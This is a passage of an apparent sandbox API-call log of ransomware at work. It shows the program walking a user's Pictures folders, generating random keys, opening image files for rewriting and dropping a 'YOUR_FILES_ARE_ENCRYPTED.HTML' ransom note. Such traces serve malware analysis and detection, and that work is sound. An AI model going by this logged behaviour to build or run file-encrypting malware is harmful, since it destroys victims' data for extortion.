dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5c8 [0168.179] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=83274) returned 1 [0168.179] GetProcessHeap () returned 0x270000 [0168.179] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x76b8ef8 [0168.183] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="C6") returned 2 [0168.183] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="B9") returned 2 [0168.183] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="05") returned 2 [0168.183] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="FC") returned 2 [0168.183] wsprintfW 
(in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="90") returned 2 [0168.183] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="50") returned 2 [0168.183] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="EC") returned 2 [0168.183] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="9D") returned 2 [0168.183] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="6D") returned 2 [0168.183] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="88") returned 2 [0168.183] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="AB") returned 2 [0168.183] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="05") returned 2 [0168.183] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="08") returned 2 [0168.183] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="41") returned 2 [0168.183] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="37") returned 2 [0168.184] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="DA") returned 2 [0168.184] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="15") returned 2 [0168.184] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="B3") returned 2 [0168.184] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="D5") returned 2 [0168.184] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="50") returned 2 [0168.184] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="AB") returned 2 [0168.184] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="6F") returned 2 [0168.184] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="E8") returned 2 [0168.184] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="0C") returned 2 [0168.184] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="88") returned 2 [0168.184] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="E9") 
returned 2 [0168.184] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="10") returned 2 [0168.184] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="A0") returned 2 [0168.184] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="8B") returned 2 [0168.184] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="8E") returned 2 [0168.184] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="0C") returned 2 [0168.184] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="44") returned 2 [0168.184] lstrcpyW (in: lpString1=0x76c8fac, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\OEA6GlM0U9_7N3aR.gif" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\OEA6GlM0U9_7N3aR.gif") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\OEA6GlM0U9_7N3aR.gif" [0168.185] CreateIoCompletionPort (FileHandle=0x5c8, ExistingCompletionPort=0x3a0, CompletionKey=0x76b8ef8, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.185] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x76b8ef8, lpOverlapped=0x76b8ef8) returned 1 [0168.185] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24ee8f40, ftCreationTime.dwHighDateTime=0x1d7dc99, ftLastAccessTime.dwLowDateTime=0x1505ba70, ftLastAccessTime.dwHighDateTime=0x1d7e56a, ftLastWriteTime.dwLowDateTime=0x1505ba70, ftLastWriteTime.dwHighDateTime=0x1d7e56a, nFileSizeHigh=0x0, nFileSizeLow=0x10fa2, dwReserved0=0x0, dwReserved1=0x60, cFileName="Rla0Af.jpg", cAlternateFileName="")) returned 1 [0168.185] wnsprintfW (in: pszDest=0x76302f8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\Rla0Af.jpg") returned 56 [0168.185] lstrcmpW (lpString1="Rla0Af.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.185] 
PathFindExtensionW (pszPath="Rla0Af.jpg") returned=".jpg" [0168.185] lstrlenW (lpString=".jpg") returned 4 [0168.185] PathFindExtensionW (pszPath="Rla0Af.jpg") returned=".jpg" [0168.185] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0168.185] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\Rla0Af.jpg" (normalized: "c:\\users\\5alr3u30d3\\pictures\\c1jo8j6\\2 kw\\rla0af.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5c4 [0168.185] GetFileSizeEx (in: hFile=0x5c4, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=69538) returned 1 [0168.185] GetProcessHeap () returned 0x270000 [0168.186] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x76e1050 [0168.189] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="80") returned 2 [0168.189] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="3A") returned 2 [0168.189] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="66") returned 2 [0168.189] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="9F") returned 2 [0168.189] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="3E") returned 2 [0168.189] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="24") returned 2 [0168.189] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="F0") returned 2 [0168.189] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="EA") returned 2 [0168.189] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="B1") returned 2 [0168.189] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="69") returned 2 [0168.189] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="57") returned 2 [0168.189] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="AE") returned 2 
[0168.189] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="1B") returned 2 [0168.189] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="8B") returned 2 [0168.189] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="C3") returned 2 [0168.189] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="1A") returned 2 [0168.189] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="F2") returned 2 [0168.189] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="FD") returned 2 [0168.189] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="52") returned 2 [0168.189] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="5A") returned 2 [0168.189] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="2E") returned 2 [0168.190] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="93") returned 2 [0168.190] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="A6") returned 2 [0168.190] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="2E") returned 2 [0168.190] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="7F") returned 2 [0168.190] lstrcpyW (in: lpString1=0x76f1104, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\Rla0Af.jpg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\Rla0Af.jpg") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\Rla0Af.jpg" [0168.190] CreateIoCompletionPort (FileHandle=0x5c4, ExistingCompletionPort=0x3a0, CompletionKey=0x76e1050, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.190] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x76e1050, lpOverlapped=0x76e1050) returned 1 [0168.190] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76d55e50, 
ftCreationTime.dwHighDateTime=0x1d7de25, ftLastAccessTime.dwLowDateTime=0xdff9d980, ftLastAccessTime.dwHighDateTime=0x1d7de8c, ftLastWriteTime.dwLowDateTime=0xdff9d980, ftLastWriteTime.dwHighDateTime=0x1d7de8c, nFileSizeHigh=0x0, nFileSizeLow=0x17537, dwReserved0=0x0, dwReserved1=0x60, cFileName="zgyTqIKo7R9.gif", cAlternateFileName="ZGYTQI~1.GIF")) returned 1 [0168.190] wnsprintfW (in: pszDest=0x76302f8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\zgyTqIKo7R9.gif") returned 61 [0168.190] lstrcmpW (lpString1="zgyTqIKo7R9.gif", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 1 [0168.190] PathFindExtensionW (pszPath="zgyTqIKo7R9.gif") returned=".gif" [0168.190] lstrlenW (lpString=".gif") returned 4 [0168.190] PathFindExtensionW (pszPath="zgyTqIKo7R9.gif") returned=".gif" [0168.191] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0168.191] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\zgyTqIKo7R9.gif" (normalized: "c:\\users\\5alr3u30d3\\pictures\\c1jo8j6\\2 kw\\zgytqiko7r9.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a8 [0168.191] GetFileSizeEx (in: hFile=0x5a8, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=95543) returned 1 [0168.191] GetProcessHeap () returned 0x270000 [0168.191] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x77091a8 [0168.195] lstrcpyW (in: lpString1=0x771925c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\zgyTqIKo7R9.gif" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\zgyTqIKo7R9.gif") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\zgyTqIKo7R9.gif" [0168.195] CreateIoCompletionPort (FileHandle=0x5a8, ExistingCompletionPort=0x3a0, CompletionKey=0x77091a8, 
NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.195] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x77091a8, lpOverlapped=0x77091a8) returned 1 [0168.195] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d623f90, ftCreationTime.dwHighDateTime=0x1d7dc39, ftLastAccessTime.dwLowDateTime=0xfaa8aab0, ftLastAccessTime.dwHighDateTime=0x1d7e632, ftLastWriteTime.dwLowDateTime=0xfaa8aab0, ftLastWriteTime.dwHighDateTime=0x1d7e632, nFileSizeHigh=0x0, nFileSizeLow=0x11ce4, dwReserved0=0x0, dwReserved1=0x60, cFileName="zpD0p 1em-JOVM.gif", cAlternateFileName="ZPD0P1~1.GIF")) returned 1 [0168.195] wnsprintfW (in: pszDest=0x76302f8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\zpD0p 1em-JOVM.gif") returned 64 [0168.195] lstrcmpW (lpString1="zpD0p 1em-JOVM.gif", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 1 [0168.195] PathFindExtensionW (pszPath="zpD0p 1em-JOVM.gif") returned=".gif" [0168.195] lstrlenW (lpString=".gif") returned 4 [0168.195] PathFindExtensionW (pszPath="zpD0p 1em-JOVM.gif") returned=".gif" [0168.195] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0168.195] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\zpD0p 1em-JOVM.gif" (normalized: "c:\\users\\5alr3u30d3\\pictures\\c1jo8j6\\2 kw\\zpd0p 1em-jovm.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x594 [0168.196] GetFileSizeEx (in: hFile=0x594, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=72932) returned 1 [0168.196] GetProcessHeap () returned 0x270000 [0168.196] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7731300 [0168.200] lstrcpyW (in: 
lpString1=0x77413b4, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\zpD0p 1em-JOVM.gif" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\zpD0p 1em-JOVM.gif") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\zpD0p 1em-JOVM.gif" [0168.200] CreateIoCompletionPort (FileHandle=0x594, ExistingCompletionPort=0x3a0, CompletionKey=0x7731300, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.200] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7731300, lpOverlapped=0x7731300) returned 1 [0168.200] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d623f90, ftCreationTime.dwHighDateTime=0x1d7dc39, ftLastAccessTime.dwLowDateTime=0xfaa8aab0, ftLastAccessTime.dwHighDateTime=0x1d7e632, ftLastWriteTime.dwLowDateTime=0xfaa8aab0, ftLastWriteTime.dwHighDateTime=0x1d7e632, nFileSizeHigh=0x0, nFileSizeLow=0x11ce4, dwReserved0=0x0, dwReserved1=0x60, cFileName="zpD0p 1em-JOVM.gif", cAlternateFileName="ZPD0P1~1.GIF")) returned 0 [0168.200] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0168.200] wnsprintfW (in: pszDest=0x76302f8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 75 [0168.200] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\pictures\\c1jo8j6\\2 kw\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0168.201] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, 
lpOverlapped=0x0) returned 1 [0168.203] CloseHandle (hObject=0x4a8) returned 1 [0168.203] GetProcessHeap () returned 0x270000 [0168.205] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76302f8 | out: hHeap=0x270000) returned 1 [0168.205] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71fb2ce0, ftCreationTime.dwHighDateTime=0x1d7de2d, ftLastAccessTime.dwLowDateTime=0x52c55ff0, ftLastAccessTime.dwHighDateTime=0x1d7df7a, ftLastWriteTime.dwLowDateTime=0x52c55ff0, ftLastWriteTime.dwHighDateTime=0x1d7df7a, nFileSizeHigh=0x0, nFileSizeLow=0x16a7d, dwReserved0=0xb916d8, dwReserved1=0x0, cFileName="7g14lH7VgBRylj.gif", cAlternateFileName="7G14LH~1.GIF")) returned 1 [0168.205] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\7g14lH7VgBRylj.gif") returned 59 [0168.205] lstrcmpW (lpString1="7g14lH7VgBRylj.gif", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.205] PathFindExtensionW (pszPath="7g14lH7VgBRylj.gif") returned=".gif" [0168.205] lstrlenW (lpString=".gif") returned 4 [0168.205] PathFindExtensionW (pszPath="7g14lH7VgBRylj.gif") returned=".gif" [0168.205] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0168.205] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\7g14lH7VgBRylj.gif" (normalized: "c:\\users\\5alr3u30d3\\pictures\\c1jo8j6\\7g14lh7vgbrylj.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x4a8 [0168.206] GetFileSizeEx (in: hFile=0x4a8, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=92797) returned 1 [0168.206] GetProcessHeap () returned 0x270000 [0168.206] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7759458 [0168.209] 
wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="BA") returned 2 [0168.209] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="A0") returned 2 [0168.209] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="FC") returned 2 [0168.209] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="1C") returned 2 [0168.209] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="67") returned 2 [0168.209] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="47") returned 2 [0168.209] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="28") returned 2 [0168.209] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="68") returned 2 [0168.209] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="DA") returned 2 [0168.209] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="98") returned 2 [0168.209] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="84") returned 2 [0168.209] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="6A") returned 2 [0168.209] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="58") returned 2 [0168.210] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="EA") returned 2 [0168.210] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="DB") returned 2 [0168.210] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="C9") returned 2 [0168.210] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="3E") returned 2 [0168.210] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="AF") returned 2 [0168.210] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="83") returned 2 [0168.210] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="06") returned 2 [0168.210] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="C7") returned 2 [0168.210] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: 
param_1="98") returned 2 [0168.210] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="F0") returned 2 [0168.210] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="F3") returned 2 [0168.210] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="2A") returned 2 [0168.210] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="1F") returned 2 [0168.210] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="2B") returned 2 [0168.210] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="7F") returned 2 [0168.210] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="B8") returned 2 [0168.210] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="26") returned 2 [0168.210] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="0E") returned 2 [0168.210] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="26") returned 2 [0168.211] lstrcpyW (in: lpString1=0x776950c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\7g14lH7VgBRylj.gif" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\7g14lH7VgBRylj.gif") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\7g14lH7VgBRylj.gif" [0168.211] CreateIoCompletionPort (FileHandle=0x4a8, ExistingCompletionPort=0x3a0, CompletionKey=0x7759458, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.211] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7759458, lpOverlapped=0x7759458) returned 1 [0168.211] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67bf96f0, ftCreationTime.dwHighDateTime=0x1d7d80e, ftLastAccessTime.dwLowDateTime=0xf7a940d0, ftLastAccessTime.dwHighDateTime=0x1d7e647, ftLastWriteTime.dwLowDateTime=0xf7a940d0, ftLastWriteTime.dwHighDateTime=0x1d7e647, nFileSizeHigh=0x0, nFileSizeLow=0x100d9, dwReserved0=0xb916d8, 
dwReserved1=0x0, cFileName="F1G7hM3SClglcU5GIl12.bmp", cAlternateFileName="F1G7HM~1.BMP")) returned 1 [0168.211] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\F1G7hM3SClglcU5GIl12.bmp") returned 65 [0168.211] lstrcmpW (lpString1="F1G7hM3SClglcU5GIl12.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.211] PathFindExtensionW (pszPath="F1G7hM3SClglcU5GIl12.bmp") returned=".bmp" [0168.211] lstrlenW (lpString=".bmp") returned 4 [0168.211] PathFindExtensionW (pszPath="F1G7hM3SClglcU5GIl12.bmp") returned=".bmp" [0168.211] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x63dbf920, ftCreationTime.dwHighDateTime=0x1d7da48, ftLastAccessTime.dwLowDateTime=0x74c23a0, ftLastAccessTime.dwHighDateTime=0x1d7db61, ftLastWriteTime.dwLowDateTime=0x74c23a0, ftLastWriteTime.dwHighDateTime=0x1d7db61, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb916d8, dwReserved1=0x0, cFileName="iV8-Qr39PzJA__E0", cAlternateFileName="IV8-QR~1")) returned 1 [0168.211] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0") returned 57 [0168.211] GetProcessHeap () returned 0x270000 [0168.211] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x76302f8 [0168.211] lstrcpyW (in: lpString1=0x76302f8, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0" [0168.211] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\*") 
returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\*" [0168.610] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x63dbf920, ftCreationTime.dwHighDateTime=0x1d7da48, ftLastAccessTime.dwLowDateTime=0x74c23a0, ftLastAccessTime.dwHighDateTime=0x1d7db61, ftLastWriteTime.dwLowDateTime=0x74c23a0, ftLastWriteTime.dwHighDateTime=0x1d7db61, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1c760c2, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0168.610] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x63dbf920, ftCreationTime.dwHighDateTime=0x1d7da48, ftLastAccessTime.dwLowDateTime=0x74c23a0, ftLastAccessTime.dwHighDateTime=0x1d7db61, ftLastWriteTime.dwLowDateTime=0x74c23a0, ftLastWriteTime.dwHighDateTime=0x1d7db61, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1c760c2, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0168.611] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8834f90, ftCreationTime.dwHighDateTime=0x1d7d8bf, ftLastAccessTime.dwLowDateTime=0xe2a43820, ftLastAccessTime.dwHighDateTime=0x1d7e1f1, ftLastWriteTime.dwLowDateTime=0xe2a43820, ftLastWriteTime.dwHighDateTime=0x1d7e1f1, nFileSizeHigh=0x0, nFileSizeLow=0x164f2, dwReserved0=0x1c760c2, dwReserved1=0x0, cFileName="4nlDuVj.gif", cAlternateFileName="")) returned 1 [0168.611] wnsprintfW (in: pszDest=0x76302f8, cchDest=32768, pszFmt="%ls\\%ls" | out: 